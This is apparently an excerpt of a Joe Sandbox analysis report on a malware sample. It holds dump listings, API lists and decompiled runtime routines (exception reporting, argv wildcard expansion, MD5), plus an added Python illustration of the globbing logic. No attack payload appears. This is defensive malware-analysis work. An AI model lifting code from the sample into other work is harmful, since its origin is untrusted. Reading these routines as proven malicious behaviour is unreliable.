    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Strings
    • %d values for %d columns, xrefs: 100543B0
    • table %S has %d columns but %d values were supplied, xrefs: 100542A4
    • rows inserted, xrefs: 10054D84
    • table %S has no column named %s, xrefs: 10054336
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 85%
    			E013346A3(intOrPtr __edx, intOrPtr __edi, intOrPtr _a4) {
    				char _v0;
    				struct _EXCEPTION_POINTERS _v12;
    				intOrPtr _v80;
    				intOrPtr _v88;
    				char _v92;
    				intOrPtr _v608;
    				intOrPtr _v612;
    				void* _v616;
    				intOrPtr _v620;
    				char _v624;
    				intOrPtr _v628;
    				intOrPtr _v632;
    				intOrPtr _v636;
    				intOrPtr _v640;
    				intOrPtr _v644;
    				_Unknown_base(*)()* _v648;
    				intOrPtr _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				intOrPtr _v664;
    				intOrPtr _v668;
    				char _v808;
    				char* _t38;
    				long _t48;
    				signed int _t50;
    				intOrPtr _t51;
    				signed char _t54;
    				intOrPtr _t55;
    				intOrPtr _t56;
    				intOrPtr _t57;
    
    				_t57 = __edi;
    				_t56 = __edx;
    				if(IsProcessorFeaturePresent(0x17) != 0) {
    					_t55 = _a4;
    					asm("int 0x29");
    				}
    				 *0x1347bd0 = 0;
    				_v632 = E01336200(_t57,  &_v808, 0, 0x2cc);
    				_v636 = _t55;
    				_v640 = _t56;
    				_v644 = _t51;
    				_v648 = 0;
    				_v652 = _t57;
    				_v608 = ss;
    				_v620 = cs;
    				_v656 = ds;
    				_v660 = es;
    				_v664 = fs;
    				_v668 = gs;
    				asm("pushfd");
    				_pop( *_t15);
    				_v624 = _v0;
    				_t38 =  &_v0;
    				_v612 = _t38;
    				_v808 = 0x10001;
    				_v628 =  *((intOrPtr*)(_t38 - 4));
    				E01336200(_t57,  &_v92, 0, 0x50);
    				_v92 = 0x40000015;
    				_v88 = 1;
    				_v80 = _v0;
    				_t28 = IsDebuggerPresent() - 1; // -1
    				_v12.ExceptionRecord =  &_v92;
    				asm("sbb bl, bl");
    				_v12.ContextRecord =  &_v808;
    				_t54 =  ~_t28 + 1;
    				SetUnhandledExceptionFilter(0);
    				_t48 = UnhandledExceptionFilter( &_v12);
    				if(_t48 == 0) {
    					_t50 =  ~(_t54 & 0x000000ff);
    					asm("sbb eax, eax");
    					 *0x1347bd0 =  *0x1347bd0 & _t50;
    					return _t50;
    				}
    				return _t48;
    			}
    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 013346B0
    • IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 01334778
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01334797
    • UnhandledExceptionFilter.KERNEL32(?), ref: 013347A1
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    C-Code - Quality: 71%
    			E01339A82(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
    				intOrPtr _v8;
    				signed int _v12;
    				intOrPtr _v28;
    				signed int _v32;
    				WCHAR* _v36;
    				signed int _v48;
    				intOrPtr _v556;
    				intOrPtr _v558;
    				struct _WIN32_FIND_DATAW _v604;
    				intOrPtr* _v608;
    				signed int _v612;
    				signed int _v616;
    				intOrPtr _v644;
    				intOrPtr _v648;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t40;
    				signed int _t45;
    				signed int _t48;
    				signed int _t50;
    				signed int _t51;
    				signed char _t53;
    				signed int _t62;
    				void* _t64;
    				union _FINDEX_INFO_LEVELS _t66;
    				signed int _t71;
    				intOrPtr* _t72;
    				signed int _t75;
    				void* _t82;
    				void* _t84;
    				signed int _t85;
    				void* _t89;
    				WCHAR* _t90;
    				void* _t91;
    				intOrPtr* _t94;
    				intOrPtr _t97;
    				void* _t99;
    				signed int _t100;
    				intOrPtr* _t104;
    				signed int _t107;
    				void* _t110;
    				intOrPtr _t111;
    				void* _t112;
    				void* _t114;
    				void* _t115;
    				signed int _t117;
    				void* _t118;
    				union _FINDEX_INFO_LEVELS _t119;
    				void* _t120;
    				void* _t123;
    				void* _t124;
    				void* _t125;
    				signed int _t126;
    				void* _t127;
    				void* _t128;
    				signed int _t132;
    				void* _t133;
    				signed int _t134;
    				void* _t135;
    				void* _t136;
    
    				_push(__ecx);
    				_t94 = _a4;
    				_t2 = _t94 + 2; // 0x2
    				_t110 = _t2;
    				do {
    					_t40 =  *_t94;
    					_t94 = _t94 + 2;
    				} while (_t40 != 0);
    				_t117 = _a12;
    				_t97 = (_t94 - _t110 >> 1) + 1;
    				_v8 = _t97;
    				if(_t97 <= (_t40 | 0xffffffff) - _t117) {
    					_t5 = _t117 + 1; // 0x1
    					_t89 = _t5 + _t97;
    					_t124 = E013388CF(_t97, _t89, 2);
    					_t99 = _t123;
    					__eflags = _t117;
    					if(_t117 == 0) {
    						L6:
    						_push(_v8);
    						_t89 = _t89 - _t117;
    						_t45 = E01339892(_t99, _t124 + _t117 * 2, _t89, _a4);
    						_t134 = _t133 + 0x10;
    						__eflags = _t45;
    						if(__eflags != 0) {
    							goto L9;
    						} else {
    							_t82 = E01339CFB(_a16, __eflags, _t124);
    							E01338804(0);
    							_t84 = _t82;
    							goto L8;
    						}
    					} else {
    						_push(_t117);
    						_t85 = E01339892(_t99, _t124, _t89, _a8);
    						_t134 = _t133 + 0x10;
    						__eflags = _t85;
    						if(_t85 != 0) {
    							L9:
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							E013374D2();
    							asm("int3");
    							_t132 = _t134;
    							_t135 = _t134 - 0x260;
    							_t48 =  *0x1347004; // 0x262637d3
    							_v48 = _t48 ^ _t132;
    							_t111 = _v28;
    							_t100 = _v32;
    							_push(_t89);
    							_t90 = _v36;
    							_push(_t124);
    							_push(_t117);
    							_t125 = 0x5c;
    							_v644 = _t111;
    							_v648 = 0x2f;
    							_t118 = 0x3a;
    							while(1) {
    								__eflags = _t100 - _t90;
    								if(_t100 == _t90) {
    									break;
    								}
    								_t50 =  *_t100 & 0x0000ffff;
    								__eflags = _t50 - _v612;
    								if(_t50 != _v612) {
    									__eflags = _t50 - _t125;
    									if(_t50 != _t125) {
    										__eflags = _t50 - _t118;
    										if(_t50 != _t118) {
    											_t100 = _t100 - 2;
    											__eflags = _t100;
    											continue;
    										}
    									}
    								}
    								break;
    							}
    							_t126 =  *_t100 & 0x0000ffff;
    							__eflags = _t126 - _t118;
    							if(_t126 != _t118) {
    								L19:
    								_t51 = _t126;
    								_t119 = 0;
    								_t112 = 0x2f;
    								__eflags = _t51 - _t112;
    								if(_t51 == _t112) {
    									L23:
    									_t53 = 1;
    									__eflags = 1;
    								} else {
    									_t114 = 0x5c;
    									__eflags = _t51 - _t114;
    									if(_t51 == _t114) {
    										goto L23;
    									} else {
    										_t115 = 0x3a;
    										__eflags = _t51 - _t115;
    										if(_t51 == _t115) {
    											goto L23;
    										} else {
    											_t53 = 0;
    										}
    									}
    								}
    								_t103 = (_t100 - _t90 >> 1) + 1;
    								asm("sbb eax, eax");
    								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
    								E01336200(_t119,  &_v604, _t119, 0x250);
    								_t136 = _t135 + 0xc;
    								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119);
    								__eflags = _t127 - 0xffffffff;
    								if(_t127 != 0xffffffff) {
    									_t104 = _v608;
    									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
    									__eflags = _t62;
    									_v616 = _t62 >> 2;
    									_t64 = 0x2e;
    									do {
    										__eflags = _v604.cFileName - _t64;
    										if(_v604.cFileName != _t64) {
    											L36:
    											_push(_t104);
    											_t66 = E01339A82(_t104,  &(_v604.cFileName), _t90, _v612);
    											_t136 = _t136 + 0x10;
    											__eflags = _t66;
    											if(_t66 != 0) {
    												goto L26;
    											} else {
    												goto L37;
    											}
    										} else {
    											__eflags = _v558 - _t119;
    											if(_v558 == _t119) {
    												goto L37;
    											} else {
    												__eflags = _v558 - _t64;
    												if(_v558 != _t64) {
    													goto L36;
    												} else {
    													__eflags = _v556 - _t119;
    													if(_v556 == _t119) {
    														goto L37;
    													} else {
    														goto L36;
    													}
    												}
    											}
    										}
    										goto L40;
    										L37:
    										_t71 = FindNextFileW(_t127,  &_v604);
    										_t104 = _v608;
    										__eflags = _t71;
    										_t64 = 0x2e;
    									} while (_t71 != 0);
    									_t72 = _t104;
    									_t107 = _v616;
    									_t113 =  *_t72;
    									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
    									__eflags = _t107 - _t75;
    									if(_t107 != _t75) {
    										E0133CB70(_t90, _t113 + _t107 * 4, _t75 - _t107, 4, E0133989D);
    									}
    								} else {
    									_push(_v608);
    									_t66 = E01339A82(_t103, _t90, _t119, _t119);
    									L26:
    									_t119 = _t66;
    								}
    								__eflags = _t127 - 0xffffffff;
    								if(_t127 != 0xffffffff) {
    									FindClose(_t127);
    								}
    							} else {
    								__eflags = _t100 -  &(_t90[1]);
    								if(_t100 ==  &(_t90[1])) {
    									goto L19;
    								} else {
    									_push(_t111);
    									E01339A82(_t100, _t90, 0, 0);
    								}
    							}
    							_pop(_t120);
    							_pop(_t128);
    							__eflags = _v12 ^ _t132;
    							_pop(_t91);
    							return E01333E82(_t91, _v12 ^ _t132, _t120, _t128);
    						} else {
    							goto L6;
    						}
    					}
    				} else {
    					_t84 = 0xc;
    					L8:
    					return _t84;
    				}
    				L40:
    			}
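The fragment above scans an argument backwards for '/', '\\' or ':' (the 0x2f, 0x5c and 0x3a compares), enumerates the directory part with FindFirstFileExW, skips the "." and ".." entries (the cFileName[0] == '.' test followed by the checks on the next two characters), appends every match to a growing argument array through E01339A82, and finally sorts only the entries added by this call (E0133CB70 with the comparator E0133989D over `new_count - old_count` pointers); the early `return 0xc` is ENOMEM. That is the structure of the C runtime's argv wildcard expansion, which matters when reading the API summary: this FindFirstFileExW call reflects command-line globbing of the sample's own arguments, not a directory search written by the malware author. The Python below is an added illustration of the visible behaviour, not code from the sample or from Joe Sandbox; the wildcard pre-check and the argument-buffer bookkeeping happen outside the fragment and are assumptions, and the runtime's collation is simplified to a case-insensitive sort.

```python
import fnmatch
import os

SEPARATORS = ("/", "\\", ":")       # 0x2f, 0x5c, 0x3a in the listing


def _is_dot_entry(name):
    # cFileName[0] == '.' and (cFileName[1] == 0 or (cFileName[1] == '.' and cFileName[2] == 0))
    return name == "." or name == ".."


def expand_wildcard(arg, listdir=os.listdir):
    """Expand one argument the way the fragment does.

    Splits after the last separator, enumerates the directory part, drops '.'
    and '..', and returns the matches sorted.  An argument that matches nothing
    (FindFirstFileExW failing) is kept literally, like the else-branch that
    passes the original string to E01339A82.
    """
    if not any(ch in arg for ch in "*?"):           # assumption: only patterns reach the routine
        return [arg]
    cut = max(arg.rfind(sep) for sep in SEPARATORS) + 1   # 0 when there is no separator
    directory, pattern = arg[:cut], arg[cut:]
    try:
        names = listdir(directory or ".")
    except OSError:
        return [arg]
    # Windows name matching is case-insensitive; only the entries found by this
    # call are sorted, which is what the qsort over (new - old) entries does.
    matches = sorted(
        (directory + name for name in names
         if not _is_dot_entry(name)
         and fnmatch.fnmatchcase(name.lower(), pattern.lower())),
        key=str.lower,
    )
    return matches or [arg]


def expand_argv(argv, listdir=os.listdir):
    """Apply expand_wildcard to every argument, preserving order."""
    out = []
    for arg in argv:
        out.extend(expand_wildcard(arg, listdir))
    return out


if __name__ == "__main__":
    # Constructed directory listing so the example runs without touching disk.
    fake = lambda d: ["b.txt", ".", "..", "a.TXT", "c.log"]
    print(expand_argv(["winlogon.exe", "*.txt", "-q"], listdir=fake))
```

`listdir` is injectable so the behaviour can be exercised against a constructed listing; with the default it walks the real file system.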

    0x01339a87
    0x01339a88
    0x01339a8f
    0x01339a8f
    0x01339a92
    0x01339a92
    0x01339a95
    0x01339a98
    0x01339a9d
    0x01339aa7
    0x01339aaa
    0x01339aaf
    0x01339ab7
    0x01339aba
    0x01339ac4
    0x01339ac7
    0x01339ac8
    0x01339aca
    0x01339ade
    0x01339ade
    0x01339ae1
    0x01339aeb
    0x01339af0
    0x01339af3
    0x01339af5
    0x00000000
    0x01339af7
    0x01339afb
    0x01339b04
    0x01339b0a
    0x00000000
    0x01339b0c
    0x01339acc
    0x01339acc
    0x01339ad2
    0x01339ad7
    0x01339ada
    0x01339adc
    0x01339b13
    0x01339b15
    0x01339b16
    0x01339b17
    0x01339b18
    0x01339b19
    0x01339b1a
    0x01339b1f
    0x01339b23
    0x01339b25
    0x01339b2b
    0x01339b32
    0x01339b35
    0x01339b38
    0x01339b3b
    0x01339b3c
    0x01339b3f
    0x01339b40
    0x01339b43
    0x01339b46
    0x01339b4c
    0x01339b56
    0x01339b72
    0x01339b72
    0x01339b74
    0x00000000
    0x00000000
    0x01339b59
    0x01339b5c
    0x01339b63
    0x01339b65
    0x01339b68
    0x01339b6a
    0x01339b6d
    0x01339b6f
    0x01339b6f
    0x00000000
    0x01339b6f
    0x01339b6d
    0x01339b68
    0x00000000
    0x01339b63
    0x01339b76
    0x01339b79
    0x01339b7c
    0x01339b98
    0x01339b9a
    0x01339b9c
    0x01339b9e
    0x01339b9f
    0x01339ba2
    0x01339bb8
    0x01339bba
    0x01339bba
    0x01339ba4
    0x01339ba6
    0x01339ba7
    0x01339baa
    0x00000000
    0x01339bac
    0x01339bae
    0x01339baf
    0x01339bb2
    0x00000000
    0x01339bb4
    0x01339bb4
    0x01339bb4
    0x01339bb2
    0x01339baa
    0x01339bc2
    0x01339bca
    0x01339bce
    0x01339bdc
    0x01339be1
    0x01339bf6
    0x01339bf8
    0x01339bfb
    0x01339c30
    0x01339c3b
    0x01339c3b
    0x01339c40
    0x01339c46
    0x01339c47
    0x01339c47
    0x01339c4e
    0x01339c6b
    0x01339c6b
    0x01339c7a
    0x01339c7f
    0x01339c82
    0x01339c84
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x01339c50
    0x01339c50
    0x01339c57
    0x00000000
    0x01339c59
    0x01339c59
    0x01339c60
    0x00000000
    0x01339c62
    0x01339c62
    0x01339c69
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x01339c69
    0x01339c60
    0x01339c57
    0x00000000
    0x01339c86
    0x01339c8e
    0x01339c94
    0x01339c9a
    0x01339c9e
    0x01339c9e
    0x01339ca1
    0x01339ca3
    0x01339ca9
    0x01339cb0
    0x01339cb3
    0x01339cb5
    0x01339cc9
    0x01339cce
    0x01339bfd
    0x01339c03
    0x01339c07
    0x01339c0f
    0x01339c0f
    0x01339c0f
    0x01339c11
    0x01339c14
    0x01339c17
    0x01339c17
    0x01339b7e
    0x01339b81
    0x01339b83
    0x00000000
    0x01339b85
    0x01339b85
    0x01339b8b
    0x01339b90
    0x01339b83
    0x01339c22
    0x01339c23
    0x01339c24
    0x01339c26
    0x01339c2f
    0x00000000
    0x00000000
    0x00000000
    0x01339adc
    0x01339ab1
    0x01339ab3
    0x01339b0d
    0x01339b12
    0x01339b12
    0x00000000

    APIs
      • Part of subcall function 013388CF: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,013395CD,00000001,00000364,?,?,01332133,?), ref: 01338910
      • Part of subcall function 013374D2: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 013374D4
      • Part of subcall function 013374D2: GetCurrentProcess.KERNEL32(C0000417,0133889C,00000016,0133959B,?,?,00000000,00000000,?,00000000,?,013338A4,00000000,?,?,00000000), ref: 013374F6
      • Part of subcall function 013374D2: TerminateProcess.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,?,013338A4,00000000,?,?,00000000,00000000,?), ref: 013374FD
    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 01339BF0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
      • Part of subcall function 100864DA: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,10086BE1,00000001,00000364,?,10084CC8,1008215D,00000000,?,?,?,1008215D,00000000), ref: 1008651B
      • Part of subcall function 10086756: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10086758
      • Part of subcall function 10086756: GetCurrentProcess.KERNEL32(C0000417,10089AEE,1009E658,0000002C,100864A7,00000016,10086C36,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 1008677A
      • Part of subcall function 10086756: TerminateProcess.KERNEL32(00000000,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 10086781
    • FindFirstFileExA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 10088765
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
      • Part of subcall function 10022940: __alldvrm.INT64 ref: 100229E8
      • Part of subcall function 10022940: __allrem.INT64 ref: 10022A5B
    • __alldiv.INT64 ref: 10023036
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • __allrem.INT64 ref: 10017406
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Strings
    • Expression tree is too large (maximum depth %d), xrefs: 100729C5
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 25%
    			E01332B70(intOrPtr __ecx, void* __edx) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				signed int _v76;
    				intOrPtr _v80;
    				signed int _v84;
    				signed int _v88;
    				signed int _v92;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t120;
    				void* _t122;
    				signed int _t341;
    				intOrPtr _t342;
    				signed int _t346;
    				signed int _t348;
    				signed int _t350;
    				signed int _t354;
    				signed int _t356;
    				signed int _t358;
    				signed int _t360;
    				signed int _t364;
    				signed int _t366;
    				signed int _t368;
    				signed int _t371;
    				signed int _t372;
    				signed int _t464;
    				signed int _t547;
    				signed int _t552;
    				signed int _t557;
    				signed int _t561;
    				signed int _t563;
    				signed int _t565;
    				signed int _t567;
    				signed int _t570;
    				signed int _t574;
    				signed int _t586;
    				signed int _t588;
    				signed int _t590;
    				signed int _t592;
    				signed int _t594;
    				signed int _t599;
    				signed int _t601;
    				signed int _t603;
    				signed int _t606;
    				signed int _t608;
    				signed int _t610;
    				signed int _t612;
    				signed int _t617;
    				signed int _t619;
    				signed int _t621;
    				signed int _t623;
    				signed int _t625;
    				signed int _t628;
    				signed int _t629;
    				signed int _t633;
    				signed int _t635;
    				signed int _t637;
    				signed int _t640;
    				signed int _t644;
    				signed int _t646;
    				signed int _t648;
    				signed int _t650;
    				signed int _t653;
    				signed int _t655;
    				signed int _t657;
    				signed int _t659;
    				signed int _t661;
    				signed int _t663;
    				signed int _t665;
    				signed int _t667;
    				intOrPtr _t668;
    				signed int _t669;
    				signed int _t670;
    				signed int _t673;
    				signed int _t675;
    				signed int _t677;
    				signed int _t679;
    				signed int _t684;
    				signed int _t686;
    				signed int _t688;
    				signed int _t692;
    				signed int _t694;
    				signed int _t696;
    				signed int _t698;
    				signed int _t700;
    				signed int _t702;
    				signed int _t704;
    				signed int _t707;
    				signed int _t712;
    
    				_t120 =  *0x1347004; // 0x262637d3
    				_v8 = _t120 ^ _t712;
    				_t122 = __edx + 2;
    				_v80 = __ecx;
    				_t669 = 0;
    				do {
    					_t574 =  *(_t122 + 1) & 0x000000ff;
    					_t122 = _t122 + 4;
    					 *((intOrPtr*)(_t712 + _t669 * 4 - 0x44)) = (((_t574 << 8) + ( *(_t122 - 4) & 0x000000ff) << 8) + ( *(_t122 - 5) & 0x000000ff) << 8) + ( *(_t122 - 6) & 0x000000ff);
    					_t669 = _t669 + 1;
    				} while (_t669 < 0x10);
    				_t629 =  *(__ecx + 0x54);
    				_t670 =  *(__ecx + 0x58);
    				_t341 =  *(__ecx + 0x5c);
    				asm("rol edx, 0x7");
    				_t586 = _v72 + 0xd76aa478 + ( !_t629 & _t341 | _t670 & _t629) +  *((intOrPtr*)(_v80 + 0x50)) + _t629;
    				_t342 = _v80;
    				asm("rol esi, 0xc");
    				_t673 = _t341 - 0x173848aa + ( !_t586 & _t670 | _t629 & _t586) + _v68 + _t586;
    				asm("ror edi, 0xf");
    				_t633 =  *((intOrPtr*)(_t342 + 0x58)) + 0x242070db + ( !_t673 & _t629 | _t673 & _t586) + _v64 + _t673;
    				asm("ror ebx, 0xa");
    				_t346 =  *((intOrPtr*)(_t342 + 0x54)) + 0xc1bdceee + ( !_t633 & _t586 | _t673 & _t633) + _v60 + _t633;
    				asm("rol edx, 0x7");
    				_t588 = _t586 + ( !_t346 & _t673 | _t633 & _t346) + 0xf57c0faf + _v56 + _t346;
    				asm("rol esi, 0xc");
    				_t675 = _t673 + ( !_t588 & _t633 | _t346 & _t588) + 0x4787c62a + _v52 + _t588;
    				asm("ror edi, 0xf");
    				_t635 = _t633 + ( !_t675 & _t346 | _t675 & _t588) + 0xa8304613 + _v48 + _t675;
    				asm("ror ebx, 0xa");
    				_t348 = _t346 + ( !_t635 & _t588 | _t675 & _t635) + 0xfd469501 + _v44 + _t635;
    				asm("rol edx, 0x7");
    				_t590 = _t588 + ( !_t348 & _t675 | _t635 & _t348) + 0x698098d8 + _v40 + _t348;
    				asm("rol esi, 0xc");
    				_t677 = _t675 + ( !_t590 & _t635 | _t348 & _t590) + 0x8b44f7af + _v36 + _t590;
    				asm("ror edi, 0xf");
    				_t637 = _t635 + ( !_t677 & _t348 | _t677 & _t590) + 0xffff5bb1 + _v32 + _t677;
    				_v92 = _t637;
    				asm("ror ebx, 0xa");
    				_t350 = _t348 + ( !_t637 & _t590 | _t677 & _t637) + 0x895cd7be + _v28 + _t637;
    				_v84 = _t350;
    				asm("rol edx, 0x7");
    				_t592 = _t590 + ( !_t350 & _t677 | _t637 & _t350) + 0x6b901122 + _v24 + _t350;
    				_v88 = _t592;
    				asm("rol edi, 0xc");
    				_t640 = _t677 - 0x2678e6d + ( !_t592 & _t637 | _t350 & _t592) + _v20 + _t592;
    				_v76 = _t640;
    				_t679 =  !_t640;
    				asm("ror ebx, 0xf");
    				_t354 = _v92 + 0xa679438e + (_t679 & _t350 | _t640 & _t592) + _v16 + _t640;
    				_t594 =  !_t354;
    				_t464 = _v76;
    				asm("ror edi, 0xa");
    				_t644 = _v84 + 0x49b40821 + (_t594 & _v88 | _t640 & _t354) + _v12 + _t354;
    				asm("rol esi, 0x5");
    				_t684 = (_t679 & _t354 | _t464 & _t644) + _v68 + _v88 + 0xf61e2562 + _t644;
    				asm("rol edx, 0x9");
    				_t599 = (_t594 & _t644 | _t354 & _t684) + _v48 + _t464 + 0xc040b340 + _t684;
    				asm("rol ebx, 0xe");
    				_t356 = _t354 + ( !_t644 & _t684 | _t599 & _t644) + 0x265e5a51 + _v28 + _t599;
    				asm("ror edi, 0xc");
    				_t646 = _t644 + ( !_t684 & _t599 | _t356 & _t684) + 0xe9b6c7aa + _v72 + _t356;
    				asm("rol esi, 0x5");
    				_t686 = _t684 + ( !_t599 & _t356 | _t599 & _t646) + 0xd62f105d + _v52 + _t646;
    				asm("rol edx, 0x9");
    				_t601 = _t599 + ( !_t356 & _t646 | _t356 & _t686) + 0x2441453 + _v32 + _t686;
    				asm("rol ebx, 0xe");
    				_t358 = _t356 + ( !_t646 & _t686 | _t601 & _t646) + 0xd8a1e681 + _v12 + _t601;
    				asm("ror edi, 0xc");
    				_t648 = _t646 + ( !_t686 & _t601 | _t358 & _t686) + 0xe7d3fbc8 + _v56 + _t358;
    				asm("rol esi, 0x5");
    				_t688 = _t686 + ( !_t601 & _t358 | _t601 & _t648) + 0x21e1cde6 + _v36 + _t648;
    				asm("rol edx, 0x9");
    				_t603 = _t601 + ( !_t358 & _t648 | _t358 & _t688) + 0xc33707d6 + _v16 + _t688;
    				_v76 = _t603;
    				asm("rol ebx, 0xe");
    				_t360 = _t358 + ( !_t648 & _t688 | _t603 & _t648) + 0xf4d50d87 + _v60 + _t603;
    				asm("ror edi, 0xc");
    				_t650 = _t648 + ( !_t688 & _t603 | _t360 & _t688) + 0x455a14ed + _v40 + _t360;
    				_v84 = _t650;
    				asm("rol edx, 0x5");
    				_t606 = _t688 - 0x561c16fb + ( !_t603 & _t360 | _t603 & _t650) + _v20 + _t650;
    				asm("rol esi, 0x9");
    				_t692 = _v76 + 0xfcefa3f8 + ( !_t360 & _t650 | _t360 & _t606) + _v64 + _t606;
    				asm("rol edi, 0xe");
    				_t653 = _t360 + 0x676f02d9 + ( !_t650 & _t606 | _t692 & _t650) + _v44 + _t692;
    				asm("ror ebx, 0xc");
    				_t364 = _v84 + 0x8d2a4c8a + ( !_t606 & _t692 | _t653 & _t606) + _v24 + _t653;
    				asm("rol edx, 0x4");
    				_t608 = _t606 + (_t692 ^ _t653 ^ _t364) + 0xfffa3942 + _v52 + _t364;
    				asm("rol esi, 0xb");
    				_t694 = _t692 + (_t653 ^ _t364 ^ _t608) + 0x8771f681 + _v40 + _t608;
    				asm("rol edi, 0x10");
    				_t655 = _t653 + (_t694 ^ _t364 ^ _t608) + 0x6d9d6122 + _v28 + _t694;
    				_t547 = _t694 ^ _t655;
    				asm("ror ebx, 0x9");
    				_t366 = _t364 + (_t547 ^ _t608) + 0xfde5380c + _v16 + _t655;
    				asm("rol edx, 0x4");
    				_t610 = _t608 + (_t547 ^ _t366) + 0xa4beea44 + _v68 + _t366;
    				asm("rol esi, 0xb");
    				_t696 = _t694 + (_t655 ^ _t366 ^ _t610) + 0x4bdecfa9 + _v56 + _t610;
    				asm("rol edi, 0x10");
    				_t657 = _t655 + (_t696 ^ _t366 ^ _t610) + 0xf6bb4b60 + _v44 + _t696;
    				_t552 = _t696 ^ _t657;
    				asm("ror ebx, 0x9");
    				_t368 = _t366 + (_t552 ^ _t610) + 0xbebfbc70 + _v32 + _t657;
    				asm("rol edx, 0x4");
    				_t612 = _t610 + (_t552 ^ _t368) + 0x289b7ec6 + _v20 + _t368;
